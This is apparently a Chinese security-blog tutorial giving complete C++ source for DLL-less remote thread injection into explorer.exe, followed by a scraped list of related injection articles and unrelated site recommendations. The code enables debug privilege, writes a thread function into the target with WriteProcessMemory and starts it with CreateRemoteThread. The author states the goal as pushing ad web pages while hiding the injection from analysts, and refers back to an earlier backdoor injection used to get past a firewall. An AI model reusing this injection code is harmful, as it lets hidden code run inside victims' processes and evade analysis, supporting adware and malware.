简介

        在之前的章节中,笔者曾介绍过有关于远程线程注入的知识,将后门.dll文件注入explorer.exe中实现绕过防火墙反弹后门。但一个.exe文件总要在注入时捎上一个.dll文件着实是怪麻烦的,那么有没有什么方法能够不适用.dll文件实现注入呢?

        答案是有的,我们可以直接将功能写在线程函数中,然后直接将整个函数注入,这个方法相较之于DLL注入会稍微复杂一些,适用于对一些体积比较小的程序进行注入。但是要注意动态链接库的地址重定位问题,因为正常的文件一般会默认载入kernel32.dll文件,而不会载入其他DLL,且只有kernel32.dll与user32.dll文件可以保证在本地和目的进程中的加载地址是一样的,所以最好要在远程线程函数中手动利用LoadLibrary和GetProcessAddress函数强制加载一遍DLL文件。Visual Studio在编译此类功能的文件时建议关闭编译器的“/GS”选项,还要其他需要注意的地方可参考此链接

        下面我们借助此方法实现让Windows资源管理器explorer.exe实现弹网页(发广告)的功能,而分析人员却无法从程序依赖的动态链接库中找到我们注入线程用的DLL文件,达到了一定的隐藏效果。

代码实现

//////////////////////////////

//

// FileName : InjectProcess.cpp

// Creator : PeterZheng

// Date : 2018/8/18 0:35

// Comment : Inject Process Without Dll File

//

//////////////////////////////

#include <cstdio>

#include <cstdlib>

#include <iostream>

#include <string>

#include <string.h>

#include <windows.h>

#include <strsafe.h>

#include <tlhelp32.h>

#define MAX_LENGTH 50

#define NORMAL_LENGTH 20

#pragma warning(disable:4996)

using namespace std;

//远程线程函数参数

typedef struct _RemoteParam

{

	CHAR szOperation[NORMAL_LENGTH];

	CHAR szAddrerss[MAX_LENGTH];

	CHAR szLb[NORMAL_LENGTH];

	CHAR szFunc[NORMAL_LENGTH];

	LPVOID lpvMLAAdress;

	LPVOID lpvMGPAAddress;

	LPVOID lpvSEAddress;

}RemoteParam;

//远程线程函数(主体)

DWORD WINAPI ThreadProc(RemoteParam *lprp)

{

	typedef HMODULE(WINAPI *MLoadLibraryA)(IN LPCTSTR lpFileName);

	typedef FARPROC(WINAPI *MGetProcAddress)(IN HMODULE hModule, IN LPCSTR lpProcName);

	typedef HINSTANCE(WINAPI *MShellExecuteA)(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);

	MLoadLibraryA MLA;

	MGetProcAddress MGPA;

	MShellExecuteA MSE;

	MLA = (MLoadLibraryA)lprp->lpvMLAAdress;

	MGPA = (MGetProcAddress)lprp->lpvMGPAAddress;

	lprp->lpvSEAddress = (LPVOID)MGPA(MLA(lprp->szLb), lprp->szFunc);

	MSE = (MShellExecuteA)lprp->lpvSEAddress;

	MSE(NULL, lprp->szOperation, lprp->szAddrerss, NULL, NULL, SW_SHOWNORMAL);

	return 0;

}

//获取PID

DWORD GetProcessID(CHAR *ProcessName)

{

	PROCESSENTRY32 pe32;

	pe32.dwSize = sizeof(pe32);

	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	if (hProcessSnap == INVALID_HANDLE_VALUE)

	{

		printf("CreateToolhelp32Snapshot error");

		return 0;

	}

	BOOL bProcess = Process32First(hProcessSnap, &pe32);

	while (bProcess)

	{

		if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)

			return pe32.th32ProcessID;

		bProcess = Process32Next(hProcessSnap, &pe32);

	}

	CloseHandle(hProcessSnap);

	return 0;

}

//获取权限

int EnableDebugPriv(const TCHAR *name)

{

	HANDLE hToken;

	TOKEN_PRIVILEGES tp;

	LUID luid;

	if (!OpenProcessToken(GetCurrentProcess(),

		TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,

		&hToken))

	{

		printf("OpenProcessToken Error!\n");

		return 1;

	}

	if (!LookupPrivilegeValue(NULL, name, &luid))

	{

		printf("LookupPrivilege Error!\n");

		return 1;

	}

	tp.PrivilegeCount = 1;

	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	tp.Privileges[0].Luid = luid;

	if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))

	{

		printf("AdjustTokenPrivileges Error!\n");

		return 1;

	}

	return 0;

}

//远程线程注入函数

BOOL InjectProcess(const DWORD dwPid)

{

	if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;

	HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

	if (!hWnd) return FALSE;

	RemoteParam rp;

	ZeroMemory(&rp, sizeof(RemoteParam));

	rp.lpvMLAAdress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "LoadLibraryA");

	rp.lpvMGPAAddress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "GetProcAddress");

	StringCchCopy(rp.szLb, sizeof(rp.szLb), "Shell32.dll");

	StringCchCopy(rp.szFunc, sizeof(rp.szFunc), "ShellExecuteA");

	StringCchCopy(rp.szAddrerss, sizeof(rp.szAddrerss), "https://www.baidu.com");

	StringCchCopy(rp.szOperation, sizeof(rp.szOperation), "open");

	RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	if (!pRemoteParam) return FALSE;

	if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;

	LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	if (!pRemoteThread) return FALSE;

	if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;

	HANDLE hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);

	if (!hThread) return FALSE;

	return TRUE;

}

//主函数

int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)

{

	CHAR szProcName[MAX_LENGTH] = "\0";

	StringCchCopy(szProcName, MAX_LENGTH, "explorer.exe");

	InjectProcess(GetProcessID(szProcName));

	ExitProcess(0);

	return 0;

}

安全之路 —— 无DLL文件实现远程线程注入的更多相关文章

  1. 安全之路 —— 无DLL文件实现远程进程注入

    简介 在之前的章节中,笔者曾介绍过有关于远程线程注入的知识,将后门.dll文件注入explorer.exe中实现绕过防火墙反弹后门.但一个.exe文件总要在注入时捎上一个.dll文件着实是怪麻烦的,那 ...

  2. 安全之路 —— 借助DLL进行远程线程注入实现穿墙与隐藏进程

    简介        大多数后门或病毒要想初步实现隐藏进程,即不被像任务管理器这样典型的RING3级进程管理器找到过于明显的不明进程,其中比较著名的方法就是通过远程线程注入的方法注入将恶意进程的DLL文 ...

  3. 详细解读:远程线程注入DLL到PC版微信

    一.远程线程注入的原理 1.其基础是在 Windows 系统中,每个 .exe 文件在双击打开时都会加载 kernel32.dll 这个系统模块,该模块中有一个 LoadLibrary() 函数,可以 ...

  4. 远程线程注入DLL突破session 0 隔离

    远程线程注入DLL突破session 0 隔离 0x00 前言 补充上篇的远程线程注入,突破系统SESSION 0 隔离,向系统服务进程中注入DLL. 0x01 介绍 通过CreateRemoteTh ...

  5. 远程线程注入DLL

    远程线程注入 0x00 前言 远程线程注入是一种经典的DLL注入技术.其实就是指一个新进程中另一个进程中创建线程的技术. 0x01 介绍 1.远程线程注入原理 画了一个图大致理解了下远程线程注入dll ...

  6. 远程线程注入dll,突破session 0

    前言 之前已经提到过,远线程注入和内存写入隐藏模块,今天介绍突破session 0的dll注入 其实今天写这个的主要原因就是看到倾旋大佬有篇文章提到:有些反病毒引擎限制从lsass中dump出缓存,可 ...

  7. 远程线程注入方法CreateRemoteThread

    最近在整理学习Windows注入方面的知识,这个远程注入前面早写过,现在看看人家博客的理解整理,整理, 需要源码的可以到我的github上下载. 链接是  https://github.com/Ars ...

  8. windows-CODE注入(远程线程注入)

    远程线程注入(先简单说,下面会详细说)今天整理下代码注入(远程线程注入),所谓代码注入,可以简单的理解为是在指定内进程里申请一块内存,然后把我们自己的执行代码和一些变量拷贝进去(通常是以启线程的方式) ...

  9. mfc HackerTools远程线程注入

    在一个进程中,调用CreateThread或CreateRemoteThreadEx函数,在另一个进程内创建一个线程(因为不在同一个进程中,所以叫做远程线程).创建的线程一般为Windows API函 ...

随机推荐

  1. Consul内部分享ppt

    Consul 是一个支持多数据中心,分布式,高可用的服务发现和配置共享系统.由 HashiCorp 公司使用 Go 语言开发,基于Raft协议.部署起来非常容易,只需要极少的可执行程序和配置文件,具有 ...

  2. 最好用的lua编辑器--------emmylua使用汇总

    最好的lua编辑器Emmylua,欢迎打脸 官方文档   https://emmylua.github.io/zh_CN/ github      https://github.com/EmmyLua ...

  3. Rails/ActiveRecord order by Array

    ActiveRecord中如果想根据自定义的一个数组id集合排序: ids = [2,1,3] users = User.where("id in (?)",ids) result ...

  4. MySQL 进阶之索引

    一,索引前传 在了解数据库索引之前,首先有必要了解一下数据库索引的数据结构基础,那么什么样的数据结构可以作为索引呢? B-tree是最常用的用于索引的数据结构.因为它们是时间复杂度低, 查找.删除.插 ...

  5. 如何在 Linux 服务器上部署多个 Tomcat

    开发管理项目时多多少少会遇到服务器不够用.一个项目分成多个子项目的情况,故研究了一下如何在一台服务器部署多个 Tomcat. 具体操作: 1.在 /tomcat/ 下部署多个 tomcat. 2.修改 ...

  6. windows下mongodb基础玩法系列二CURD操作(创建、更新、读取和删除)

    windows下mongodb基础玩法系列 windows下mongodb基础玩法系列一介绍与安装 windows下mongodb基础玩法系列二CURD操作(创建.更新.读取和删除) windows下 ...

  7. Apollo 4 客户端 SDK 设计

    前言 之前聊了客户端的一些功能,例如融入 Spring, @value 注解的自动刷新实现,长轮询等,这次从客户端的整体设计来聊聊. 设计 上图是 client 项目的包结构. 其中,核心包就是 in ...

  8. C#基础 数据类型 类型转换

    本节主要讲解数据类型和各类型之间的转换,两点都是重点,难点在于各种转换的活学活用. 一   数据类型 (一)基本数据类型 1  值类型 (1)整形         int                ...

  9. HighCharts使用更多图表HighChartsMore

    添加highcharts-moreimport HighCharts from 'highcharts'import highchartsMore from 'highcharts/highchart ...

  10. 将javaWeb项目转maven项目

    不经常做此类转换,所以总是忘记转换方法,特此,记录下转换步骤 1.首先从SVN检出项目 2.找到导出项目路径 3.按住Shift+鼠标右键,打开控制台 3.输入命令mvn eclipse:eclips ...